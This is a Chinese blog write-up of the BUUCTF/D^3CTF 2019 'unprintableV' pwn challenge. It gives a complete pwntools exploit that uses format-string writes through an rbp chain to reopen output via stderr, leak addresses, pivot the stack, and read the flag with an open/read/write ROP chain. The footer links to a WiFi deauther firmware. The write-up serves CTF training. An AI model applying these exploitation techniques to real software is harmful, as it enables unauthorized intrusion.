[BUUCTF-pwn] d3ctf_2019_unprintableV

最新推荐文章于 2022-07-04 22:57:08 发布
最新推荐文章于 2022-07-04 22:57:08 发布
阅读量332 收藏
点赞数
分类专栏: CTF pwn 文章标签: python
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_52640415/article/details/121241617
版权

这个题跟着exp作了好久,好久,值得纪念

先看保护

buuctf/378_d3ctf_2019_unprintablev$ seccomp-tools dump ./pwn
 line  CODE  JT   JF      K
=================================
 0000: 0x20 0x00 0x00 0x00000004  A = arch
 0001: 0x15 0x00 0x05 0xc000003e  if (A != ARCH_X86_64) goto 0007
 0002: 0x20 0x00 0x00 0x00000000  A = sys_number
 0003: 0x35 0x00 0x01 0x40000000  if (A < 0x40000000) goto 0005
 0004: 0x15 0x00 0x02 0xffffffff  if (A != 0xffffffff) goto 0007
 0005: 0x15 0x01 0x00 0x0000003b  if (A == execve) goto 0007
 0006: 0x06 0x00 0x00 0x7fff0000  return ALLOW
 0007: 0x06 0x00 0x00 0x00000000  return KILL
buuctf/378_d3ctf_2019_unprintablev$ checksec pwn
[*] '/home/shi/buuctf/378_d3ctf_2019_unprintablev/pwn'
    Arch:     amd64-64-little
    RELRO:    Full RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      PIE enabled

从名字上看是formatstr的问题,保护除了canary全开(这个也可以关,printf写也用不着连续),并且关掉了execve,也就是得用ORW,把flag读出来再写出来,不能get shell

再看程序,程序也很简单 main->menu->vuln->printf,输入d^3CTF退出循环,可恶之处是关掉了stdout,需要将stdout改为stderr,改的这段得盲敲

void __cdecl menu()
{
  char *a; // [rsp+8h] [rbp-8h] BYREF

  a = buf;
  puts("welcome to d^3CTF!");
  printf("here is my gift: %p\n", &a);
  puts("may you enjoy my printf test!");
  close(1);
  while ( strncmp(buf, "d^3CTF", 6uLL) && time )
    vuln();
}
void __cdecl vuln()
{
  read(0, buf, 0x12CuLL);
  printf(buf);
  --time;
}

另外,读入数据写到buf上,buf不在栈上,这就要用rbp链

0000| 0x7fffffffdf80 --> 0x7fffffffdfa0 --> 0x7fffffffdfc0 --> 0x555555554b60      #6
0008| 0x7fffffffdf88 --> 0x555555554afb (<menu+89>:	mov    edx,0x6)
0016| 0x7fffffffdf90 --> 0x7fff000000000006 
0024| 0x7fffffffdf98 --> 0x555555756060 ("AAAAAAAA-%p-%p-%p-%p-%p-%p-%p-%p\n")     #leak 
0032| 0x7fffffffdfa0 --> 0x7fffffffdfc0 --> 0x555555554b60 (<__libc_csu_init>)     #10              
0040| 0x7fffffffdfa8 --> 0x555555554b51 (<main+45>:	mov    eax,0x0)
0048| 0x7fffffffdfb0 --> 0x7fffffffe0a8 --> 0x7fffffffe3bc (".../pwn")
0056| 0x7fffffffdfb8 --> 0x100000000 
0064| 0x7fffffffdfc0 --> 0x555555554b60 (<__libc_csu_init>:	push   r15)
0072| 0x7fffffffdfc8 --> 0x7ffff7a3fa87 (<__libc_start_main+231>:	mov    edi,eax)

程序一开始以礼物的形式给了栈地址:...df98这个位置,也就是buf指针

rbp链就是 df80->dfa0->dfc0->55....60 偏移对应的是6->10-> 只需要用6修改10就可以写栈里大部分位置,因为栈都很短(连canary都没有)

由于限制使用execve用ORW的话rop会很长,程序里限制了vuln的使用次数64,所以这里要作个移栈,把栈移到buf这,把payload写到这里

步骤:

  1. 收礼物 得到buf的栈地址
  2. 通过偏移6修改10让它指向buf(9)
  3. 通过10修改9,原来它是buf指针指向bss里buf,修改2字节指向stdout,?XXX
  4. 通过9修改stdout两字节让他变更stderr这样就能输出信息了,由于有1位未知需要爆破
  5. 发个标记验证一下是否修改成功,不成功raise个例外重来
  6. 泄露偏移11的main_ret和15的libc_start_main_ret 得到加载地址和libc
  7. 修改rbp,libc_start_main_ret为 &buf和leave_ret
  8. 修复原来被改动的偏移10的rbp,让他指回原来的位置
  9. 在buf写入rop,写入d^3CTF退出

完整的exp

from pwn import *

'''
patchelf --set-interpreter /pwn/libc6_2.27-3u1/lib64/ld-2.27.so pwn
patchelf --add-needed /pwn/libc6_2.27-3u1/lib64/libc-2.27.so pwn
'''

elf = ELF('./pwn')
context.arch = 'amd64'

local = 0
if local == 1:
    libc_elf = ELF('/pwn/libc6_2.27-3u1/lib64/libc-2.27.so')
    one = [0x4240e, 0x42462, 0xe31ee]
    offset = 0x3b12a0  #__libc_IO_vtables:00000000003B12A0 _IO_file_jumps
else:
    libc_elf = ELF('../libc6_2.27-3ubuntu1_amd64.so')
    one = [0x4f2c5, 0x4f322, 0x10a38c]
    offset = 0x3e82a0  #__libc_IO_vtables:00000000003E82A0 _IO_file_jumps

def connect():
    if local == 1:
        p = process('./pwn')
    else:
        p = remote('node4.buuoj.cn', 27162) 
    return p

context(arch='amd64') #, log_level='debug'

bss_stdout = elf.sym['stdout'] #0x202040
main_addr  = elf.sym['main']
buf_addr_s   = elf.sym['buf']

_IO_2_1_stderr_   = libc_elf.sym['_IO_2_1_stderr_']
libc_start_main = libc_elf.sym['__libc_start_main']
open_addr_s = libc_elf.sym['open']
read_addr_s = libc_elf.sym['read']
write_addr_s= libc_elf.sym['write']

pop_rdi_s   = 0x0000000000000bc3 # pop rdi ; ret
pop_rsi_s   = 0x0000000000000bc1 # pop rsi ; pop r15 ; ret
leave_ret_s = 0x0000000000000b56 # leave ; ret
pop_rdx_s   = next(libc_elf.search(asm('pop rdx;ret')))  #libc

'''
0000| 0x7fffffffdf80 --> 0x7fffffffdfa0 --> 0x7fffffffdfc0 --> 0x555555554b60  #6
0008| 0x7fffffffdf88 --> 0x555555554afb (<menu+89>:	mov    edx,0x6)
0016| 0x7fffffffdf90 --> 0x7fff000000000006 
0024| 0x7fffffffdf98 --> 0x555555756060 ("AAAAAAAA-%p-%p-%p-%p-%p-%p-%p\n")     #leak 
0032| 0x7fffffffdfa0 --> 0x7fffffffdfc0 --> 0x555555554b60   #10
0040| 0x7fffffffdfa8 --> 0x555555554b51 (<main+45>:	mov    eax,0x0)
0048| 0x7fffffffdfb0 --> 0x7fffffffe0a8 --> 0x7fffffffe3bc ("pwn")
0056| 0x7fffffffdfb8 --> 0x100000000 
0064| 0x7fffffffdfc0 --> 0x555555554b60 (<__libc_csu_init>:	push   r15)
0072| 0x7fffffffdfc8 --> 0x7ffff7a3fa87 (<__libc_start_main+231>:	mov    edi,eax)

0x555555756020 <stdout@@GLIBC_2.2.5>:	0x00007ffff7dd3760	0x0000000000000000
0x555555756030 <stdin@@GLIBC_2.2.5>:	0x00007ffff7dd2a00	0x0000000000000000
0x555555756040 <stderr@@GLIBC_2.2.5>:	0x00007ffff7dd3680	0x0000000000000000

df80->dfa0->df98->0x555555756020 ?760-> 0680
'''

def write_i(stack,index,addr):  
    i = 0  
    while addr > 0:  
        payload = '%' + str((stack + 0x8*index + i) & 0xFF) + 'c%6$hhn TAG'  
        p.sendline(payload.encode())  
        p.recvuntil(b'TAG')  
        data = addr & 0xFF  
        payload = '%' + str(data) + 'c%10$hhn TAG'  
        p.sendline(payload.encode())  
        p.recvuntil(b'TAG')  
        addr = addr >> 8  
        i+=1

def crack():  
   #获得buf指针的地址
   p.recvuntil(b'here is my gift: ')
   stack = int(p.recvline()[:-1],16)  
   print ('stack:', hex(stack)) 
   
   #6->10 10->9 9->bss_buf:bss_stdout
   p.recvuntil(b'may you enjoy my printf test!\n')  
   payload = '%' + str(stack & 0xFF) + 'c%6$hhn'  
   p.sendline(payload.encode().ljust(0x12C-1, b'\x00'))  

   sleep(0.2)  
   payload = '%' + str(bss_stdout & 0xFF) + 'c%10$hhn'  
   p.sendline(payload.encode().ljust(0x12C-1, b'\x00'))  
   
   
   sleep(0.2) 
   #gdb.attach(p)
   #h = int(input('h='), 16)
   h=0
   payload = '%' + str((_IO_2_1_stderr_ & 0xFFF) + h*0x1000) + 'c%9$hn'  #?XXX
   p.sendline(payload.encode().ljust(0x12C-1, b'\x00'))  

   sleep(0.2)  
   p.sendline(b'aaaaaaa'.ljust(0x12C-1, b'\x00'))  
  
   x = p.recvuntil(b'aa',timeout=0.5)  
   if b'aa' not in x:
       print('XXXXXX') 
       raise Exception('retry')
   
   print('output open!')
   #泄露main+0x2D的地址  
   payload = 'TAG%11$p,%15$pTAG'
   p.sendline(payload.encode())  
   p.recvuntil(b'TAG')
   pwn_base = int(p.recvuntil(b',', drop=True),16) - 0x2D - main_addr
   pop_rsi  = pop_rsi_s + pwn_base
   pop_rdi  = pop_rdi_s + pwn_base 
   buf_addr  = buf_addr_s + pwn_base 
   leave_ret = leave_ret_s + pwn_base
   
   print(hex(pwn_base), hex(pop_rdi), hex(pop_rsi), hex(buf_addr), hex(leave_ret))
   #泄露__libc_start_main+E7的地址  
   libc_base = int(p.recvuntil(b'TAG',drop=True),16) - 0xE7 - libc_start_main  
   open_addr    = libc_base + open_addr_s 
   read_addr    = libc_base + read_addr_s
   write_addr   = libc_base + write_addr_s
   pop_rdx      = libc_base + pop_rdx_s
   print(hex(libc_base), hex(open_addr), hex(read_addr), hex(write_addr), hex(pop_rdx))
  
   #修改main的rbp,做栈迁移
   print('change rbp->buf') 
   write_i(stack,5,buf_addr+8)
   #这次,我们写main的返回地址,也就是main ebp后面那个空间  
   print('change return->leave_ret')
   write_i(stack,6,leave_ret) #leave_ret
  
   #复原menu的rbp  
   print('write back menu rbp->stack+x28')
   payload = '%' + str((stack + 0x28) & 0xFF) + 'c%6$hhn TAG'  
   p.sendline(payload.encode())
   p.recvuntil(b'TAG')
  
   #当退出main时,栈会转移到buf里去,pop_rdi+1是ret限止没命中,向前滑一下
   rop  = b'A'*8 + flat(pop_rdi+1, pop_rdi+1, pop_rsi,0,0,pop_rdi, buf_addr+0xc8, open_addr) #Open
   rop += flat(pop_rdx, 0x30, pop_rsi, buf_addr+0x100,0,pop_rdi, 1, read_addr) #Read
   rop += flat(pop_rdx, 0x30, pop_rsi, buf_addr+0x100,0,pop_rdi, 2, write_addr) #Write
   rop  = rop.ljust(0xC8, b'\x00')  
   #存入flag字符串  
   rop += b'flag\x00'  
   #rop  = rop.ljust(0x12C-1, b'\x00')  
   p.sendline(rop)

   payload = b'd^3CTF\x00'
   p.sendline(payload)
   
   p.interactive()  

while True:
    try:
        p = connect()
        crack()
    except KeyboardInterrupt as e:
        exit()
    except:
        p.close()
        print ('retrying...')
    #break

几个注意的小点:

  1. interactive本身是没用的,因为得不到shell但是可以让程序停下来
  2. stdout关闭后,再打开文件的描述符是1(用stdout关闭的空闲号,原来都用3)
  3. 在没有输出里用sleep作间隔,防止由于输入没完成(两字节的时候)后续写错
  4. 测试开没开输出时raise报个错让try得到可以重来(程序本身没有崩)
石氏是时试
关注
专栏目录
BUUCTF:[Black Watch 入群题]PWN(write up)
qq_44768749的博客
08-23 932
BUUCTF:[Black Watch 入群题]PWN0x01 文件分析0x02 运行0x03 IDA0x04 思路0x05 exp0x06 栈迁移补充32位程序 0x01 文件分析 开启了栈不可执行 0x02 运行 运行一下没什么特殊的,猜测应该是栈溢出 0x03 IDA 虽然buf在栈上但输入的长度仅仅能够覆盖ebp和返回地址,但s在bss段,而且输入的长度也够长,因此想到了栈迁移,覆盖vul_function返回地址,使其到bss段上执行 0x04 思路 s在bss段上的地址为0
2019 D^3CTF unprintableV详细题解
seaaseesa的博客
11-30 1576
unprintableV 这是2019 d3ctf的一道pwn题,由于当时知识储备不够没做出来,赛后就好好研究,从中学到了新的知识 本题用到的知识有:ROP、stdout指针与stderr指针、栈迁移、格式化字符串漏洞 首先,我们检查一下程序的保护机制 除了canary,其它的保护都开了 然后,我们用IDA分析一下 这个沙箱函数,把execve函数给禁用了,所以,我们不能getsh...
buuctf-pwn write-ups (1)
CoLin的pwn小屋
05-01 434
buuctf-pwn 001-016题wp
buuctf-pwn write-ups (4)
CoLin的pwn小屋
06-12 519
buuctf 032-038题题解,重点关注038题 pwnable_orw
buuctf-pwn write-ups (2)
CoLin的pwn小屋
05-07 289
buuctf-pwn 017-026题wp,重点关注babyheap
Wi-PWN_8.0_ENGLISH_OLED.bin
08-25
这是ESP8266的带OLED显示的WIFI杀手固件。
Wi-PWN_8.0_ENGLISH.bin
08-25
ESP8266的WIFI杀手固件,这是不带显示的。 我后续更新带OLED显示的固件。教程后将更新。
BUUCTF-PWN-[ZJCTF 2019]Login
07-10
BUUCTF-PWN-[ZJCTF 2019]Login
初学pwn-BUUCTF(ciscn_2019_n_1)
天柱的博客
08-31 639
初学pwn-writeUp BUUCTF的第四道题,ciscn-2019_n_1。 首先还是链接远端查看一下。 这里提示让猜一个数字,然后他告诉我们,这个数字应该是11.28125。这就有点掩耳盗铃了呀,但是输入了11.28125,还是在说应该输入11.28125。可能是有点问题,ida打开查看一下。 可以看到主函数里,调用了三个函数,前两个都是set某个值,我们直接看func函数。 那这就很明显了,刚刚输入的值赋给了v1,但是这里是要让v2的值等于11.28125才可以。查看一下地址。 嗯,跟想象
BUUCTF - PWN】ciscn_2019_c_1
古月浪子的博客
03-20 4084
checksec一下 IDA打开看看,encrypt函数内存在栈溢出漏洞 由于程序会将输入的内容加密,这会破坏我们的payload,所以注意到strlen函数,通过在payload开头放上 \0 来绕过加密 由于程序内没有后门函数,也没有system函数,所以考虑ret2libc 特别注意到题目是部署在Ubuntu18上的,因此调用system需要栈对齐,这里填充ret来对齐 from pwn...
BUUCTF-PWN-Writeup-1-5
feng的博客
01-20 3228
前言 开始刷一刷BuuctfPWN题,一遍学一遍刷题了。 其实主要是堆学的顶不住了。。。一个下午才搞懂一个知识点,太tm的难了。 test_your_nc from pwn import * from LibcSearcher import * context(log_level="debug",os="linux") p = remote('node4.buuoj.cn',27517) p.interactive() rip 坑。。。。 一个gets的栈溢出,后门函数fun()在0x401186,本
buuctf-pwn write-ups (3)
CoLin的pwn小屋
05-15 279
buuctf pwn 027-031题
buuctf-pwn write-ups (5)
CoLin的pwn小屋
06-17 245
buuctf-pwn 039~046题
buuctf-pwn write-ups (6)
CoLin的pwn小屋
06-24 1154
buuctf-pwn 047~053题,重点关注第53题的C++ pwn
buuctf-pwn write-ups (9)
CoLin的pwn小屋
07-04 242
buuctf-pwn 067~072题题解
[PWN] BUUCTF not_the_same_3dsctf_2016 1 Writeup
Csome
05-21 557
解题 checksec 先checksec一下,发现没有开canary方便了栈溢出,PIE也没开 反编译 IDA反编译 main函数 get_secret函数 分析利用 程序先进入main函数,有一个gets(无限长度的栈溢出) get_secret函数是将flag.txt读入bss段中,并没有做输出的操作 思路:,在main函数中修改main函数的返回地址,返回到get_secret函数中,读取flag,再返回到mian函数中(第二次进入main函数),修改返回地址为printf的地址,传入flag
buuctf [第五空间2019 决赛]PWN5 writeup
yajuanpi4899的博客
01-16 2026
一、题目速阅 拿到题目,进行check 得到信息,可知开启了金丝雀,32位 IDA进行反编译: 题目分析:该题逻辑是将dword_804C044中值与第二次输入的passwd进行校对,如果相等则执行system("/bin/sh"),确认payload目标:使第二次值相等,而可以看到printf中有格式化字符串,根据此构建payload。 二、知识要点 格式化字符串漏洞: 利用常用方式检索字符在栈上偏移量: 如图所示,41414141即AAAA,可以看到距离AAAA偏移10位 可..
PWN系列】 Buucf babyheap_0ctf_2017 Writeup
Vicl1fe的博客
11-27 671
个人博客地址 http://www.darkerbox.com 欢迎大家学习交流 参考网址: https://www.cnblogs.com/luoleqi/p/12349714.html 分析 参考网址说的已经不错了,主要问题出现在fill功能,只要chunk存在,即可写任意长度的字符。 主要还是利用fasbin attack和unsorted的特性(下面会说到)来修改__malloc_hook拿到shell。 这里我来实际走一遍exp的流程,下面的exp我用的是本地的libc。 利用 下面的代码定
[BUUCTF-pwn]——x_ctf_b0verfl0w
Y_peak的博客
03-27 608
[BUUCTF-pwn]——x_ctf_b0verfl0w 很简单的一个ret2libc题型,利用栈溢出,构造循环调用 第一次leek地址,之后就可以构造我们想要的rop链了 exploit from pwn import * from LibcSearcher import * #p = process('./b0verfl0w') p = remote('node3.buuoj.cn',26806) elf = ELF('./b0verfl0w') context.log_level = 'debug
buuctf [HarekazeCTF2019]baby_rop2
最新发布
09-30
[BUUCTF-pwn]——[HarekazeCTF2019]baby_rop2是一个pwn题目。在这个题目中,主要的目标是获取read函数的地址,并利用该地址泄漏libc基址,然后计算system函数和/bin/sh字符串的地址,最终执行system('/bin/sh')获取...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值